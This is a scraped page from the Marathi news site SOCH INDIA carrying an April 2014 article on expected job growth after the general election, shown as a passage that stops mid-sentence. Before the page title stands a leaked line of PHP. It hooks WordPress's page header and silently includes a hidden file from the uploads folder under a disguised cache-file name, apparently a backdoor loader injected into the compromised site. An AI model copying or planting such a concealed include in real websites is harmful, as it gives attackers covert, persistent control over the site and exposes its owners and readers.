add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); स्थिर सरकार आल्यानंतर रोजगार वाढणार – SOCH INDIA
Menu

व्यापार
स्थिर सरकार आल्यानंतर रोजगार वाढणार

nobanner

सोमवार ७ एप्रिल २०१४ एक नजर (07-04-2014 : 04:06:52) नवी दिल्ली : लोकसभेची सार्वत्रिक निवडणूक झाल्यानंतर केंद्रात स्थिर सरकार आल्यास यंदा रोजगाराच्या संधीमध्ये मोठी वाढ होईल, असा अंदाज मनुष्यबळ बाजारातील जाणकारांनी व्यक्त केला आहे. यानुसार रोजगार संधींत ३0 ते ४0 टक्क्यांच्या तेजीसह २0 लाख जणांना नव्या नोकर्‍या मिळतील. मनुष्यबळ तथा रोजगार कंपन्यांच्या अंदाजानुसार, भारतीय कंपन्यांना २0१४ मध्ये आपल्या सध्याच्या व्यावसायिक गरजा पूर्ण करण्यासाठी १२ ते १४ लाख जणांच्या भरतीची आवश्यकता आहे. निवडणुकीनंतर केंदात कडबोळे सरकार न येता सत्तेत स्थैर्य आल्यास यात झपाट्याने वाढ होईल. अशा स्थितीत २0१४ मध्ये २0 लाख जणांना नव्या रोजगार संधी उपलब्ध होतील, असा कयास यांनी व्यक्त केला. गेल्या वर्षी भारतीय कंपन्यांनी विविध क्षेत्रांत १0 लाख रोजगार दिले. मात्र, आर्थिक नरमीमुळे मोठय़ा प्रमाणात नोकर कपातही करावी लागली. यामुळे नोकर्‍यांमध्ये निव्वळ वाढ कमी नोंदली गेली. रोजगार बाजारात माध्यम, पीआर, कार्यक्रम व्यवस्थापन, बाजार शोध व सोशल मीडिया या क्षेत्रांतील नोकर्‍यांमध्ये वाढ होईल. राजकीय पक्षही मतदारांनाआकर्षित करण्यासाठी खर्च करीत आहेत. तथापि, सध्या मिळणार्‍या रोजगारांच्या संधी या अस्थायी स्वरूपाच्या आहेत. दीर्घ काळासाठीच्या नोकर्‍यांना या निवडणूक निकालानंतर तेजी मिळेल. मनुष्यबळ सल्लागार फर्म टीमलीज सव्हिर्सेसचे वरिष्ठ उपाध्यक्ष आणि सहसंस्थापक रितुपर्णा चक्रवर्ती यांनी सांगितले की, ‘कमीत कमी पक्षांच्या मदतीने स्थिर सरकार सत्तेत आल्यानंतर रोजगार बाजारात उल्लेखनीय सुधारणा होईल. देशात यंदा २0 लाखांहून रोजगाराच्या संधींची निर्मिती होणे गरजेचे आहे